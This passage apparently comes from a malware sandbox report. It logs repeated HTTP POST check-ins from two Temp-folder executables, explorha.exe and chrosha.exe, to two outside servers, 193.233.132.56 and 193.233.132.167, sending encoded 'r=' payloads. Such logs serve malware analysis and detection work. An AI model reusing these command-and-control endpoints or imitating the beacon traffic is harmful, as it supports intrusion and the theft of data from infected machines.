                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:48.153949022 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
188 | 192.168.2.5 | 50028 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:48.163368940 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:48.413213968 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
189 | 192.168.2.5 | 50029 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:48.315152884 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:48.559663057 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:48.561558008 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:48.815291882 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
190 | 192.168.2.5 | 50030 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:48.777595997 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:49.022965908 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
191 | 192.168.2.5 | 50031 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:49.178529024 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:49.426326036 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:49.427573919 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:49.680027008 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
192 | 192.168.2.5 | 50032 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:49.278162003 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:49.534044027 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
193 | 192.168.2.5 | 50033 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:49.646121025 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:49.889524937 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
194 | 192.168.2.5 | 50034 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:50.039347887 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:50.283154011 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:50.284434080 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:50.533574104 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
195 | 192.168.2.5 | 50035 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:50.143151999 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:50.396807909 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
196 | 192.168.2.5 | 50036 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:50.758999109 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:51.004717112 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
197 | 192.168.2.5 | 50037 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:50.897447109 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:51.147028923 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:51.148555994 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:51.400620937 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
198 | 192.168.2.5 | 50038 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:51.255101919 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:51.501164913 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
199 | 192.168.2.5 | 50040 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:51.751411915 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:51.994056940 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:51.995008945 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:52.245302916 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
200 | 192.168.2.5 | 50041 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:51.868043900 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:52.115941048 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
201 | 192.168.2.5 | 50042 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
